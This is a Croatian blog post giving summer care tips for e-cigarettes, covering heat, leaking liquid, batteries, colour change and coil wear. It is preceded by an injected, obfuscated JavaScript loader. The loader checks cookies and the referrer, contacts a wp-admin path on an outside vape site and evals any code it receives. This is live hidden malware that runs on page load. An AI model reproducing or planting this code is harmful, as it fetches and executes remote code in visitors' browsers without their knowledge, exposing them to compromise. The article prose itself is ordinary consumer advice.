;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Nekoliko korisnih savjeta za korištenje e-cigareta tijekom ljeta

Stiže ljetno vrijeme, vrijeme sunčanja i godišnjih odmora, a s njime i velike vrućine koje mogu škoditi vašoj e-cigareti ukoliko ne obratite pažnju na par sitnica.

Ne brinite, ne radi se ovdje o nekim velikim potencijalnim opasnostima – vaša se e-cigareta neće spontano zapaliti u dvorištu dok roštiljate – ali svakako bi bilo dobro pokušati održati vaše vape uređaje u najboljem mogućem stanju na ljetnom suncu.

Pokušajte izbjeći izravno sunce

Prvo, izravna sunčeva svjetlost može zagrijati e-tekućinu u spremniku za vape i učiniti je rjeđom. Ukoliko je tekućina previše rijetka, može iscuriti iz vašeg atomizera što nikome od nas nije ugodno. Ukoliko koristite RBA, možete stavljati malo više vate nego obično kako bi se višak tekućine upio, ali svakako bi najbolje bilo da izbjegavate ostavljati uređaj na izravnom suncu ili u izrazito toplim uvjetima.

Osim toga, nijedna baterija ne radi dobro kada je izložena ekstremnim temperaturama. Iako je vaša baterija možda ugrađena u vašu e-cigaretu, ljetno sunce još uvijek može na nju utjecati. Čuvajte svoju e-cigaretu na hladnom, sjenovitom mjestu, a ako ste vani, pokrijte je ručnikom ili je držite u torbi.

Ne ostavljajte svoju e-cigaretu u vrućim automobilima

Iz istih razloga iz kojih svoje e-cigarete ne bi trebali ostavljati na suncu, ne bi ih trebali ostavljati i u vrućim automobilima. Temperatura u automobilu tijekom ljeta može doseći ogromne cifre što će najvjerojatnije rezultirati curenjem tekućine ukoliko uređaj nije u uspravnom položaju, a može štetiti i bateriji, kao i samom uređaju.

Aroma i boja tekućine mogu se promijeniti na visokoj temperaturi

Kada svoju tekućinu nosite sa sobom ili kada je pohranjujete kod kuće, pazite da je ne ostavljate na izravnoj sunčevoj svjetlosti ili u prostorijama koje su prevruće. Vaša e-tekućina može potpuno promijeniti ili čak izgubiti okus ako se dovoljno dugo ostavite na vrućini i izravnom suncu!

Na vrućini možete primijetiti i da vam tekućina mijenja boju, najčešće poprimajući žute ili smeđe nijanse koje ranije niste primijetili kod iste tekućine. Međutim, ovo nije razlog za brigu. Ovo je jednostavno reakcija nikotina na sunce i toplinu. Što više nikotina imate u tekućini, to će ona tamnija postati, no to ne mora nužno značiti da je promijenila aromu.

Grijači mogu trajati kraće nego inače

Zavojnice mogu biti vrlo osjetljive čak i u savršenim uvjetima, a kamo li tijekom ljeta. Ukoliko parite slatke tekućine koje sadrže šećere, saharozu ili zaslađivače, velika je vjerojatnost da će vaši grijači trajati kraće u bilo koje doba godina. Ovaj je problem još izraženiji tijekom ljeta jer se tijekom velike vrućine šećeri i arome mogu se malo karamelizirati, dajući lagano zagorjeli okus.

Da biste to riješili, morat ćete češće čistiti zavojnice, češće ih mijenjati ili se prebaciti na e-tekućinu koja ne sadrži šećer.

Probajte nove e-tekućine drugačijih okusa

Tijekom ljeta, a naročito tijekom ekstremnih vrućina, vaša vam omiljena, aromatična duhanska e-tekućina možda neće biti onoliko ugodna za parenje kao obično. Ukoliko primijetite a u tekućinama koje obično parite ne uživate isto kao prije, možda je vrijeme da probate neke laganije, ljetne okuse. Probajte novi miks voća i hladila ili eksperimentirajte malo s aromama koje vam zvuče privlačno – možda se ugodno iznenadite.

Choose your Reaction!
Leave a Comment